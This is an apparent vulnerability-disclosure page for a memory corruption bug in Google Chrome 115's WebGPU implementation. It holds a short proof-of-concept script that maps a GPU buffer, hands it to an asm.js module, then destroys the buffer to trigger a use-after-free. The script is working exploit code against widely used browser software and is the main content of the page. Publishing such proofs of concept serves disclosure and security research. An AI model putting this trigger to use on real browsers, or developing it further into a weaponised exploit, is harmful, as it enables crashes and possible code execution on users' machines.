Google Chrome 115.0.5790.102 Memory Corruption

2023.07.25

Credit: Jean Pereira

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<script>
/*
Google Chrome WebGPU Memory Corruption
Author: Jean Pereira <pereira.one.010@gmail.com>
Released: 2023/06/25
Vendor: https://www.google.com
Software: https://www.google.com/chrome/
Tested with version: 115.0.5790.102 (latest version)
*/

navigator.gpu.requestAdapter().then(a => {
  a.requestDevice().then(d => {
    const b = d.createBuffer({
      mappedAtCreation: true,
      size: 0x1000,
      usage: GPUBufferUsage.MAP_WRITE,
    })

    function asm(s, a, b) {
      'use asm'
      var arr = new s.Uint32Array(b)

      function nop(x) {
        x = x | 0
      }
      return nop
    }

    asm({
      Uint32Array: Uint32Array
    }, {}, b.getMappedRange())

    b.destroy()
  })
})
</script>

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Google Chrome 115.0.5790.102 Memory Corruption

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Google Chrome 115.0.5790.102 Memory Corruption

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.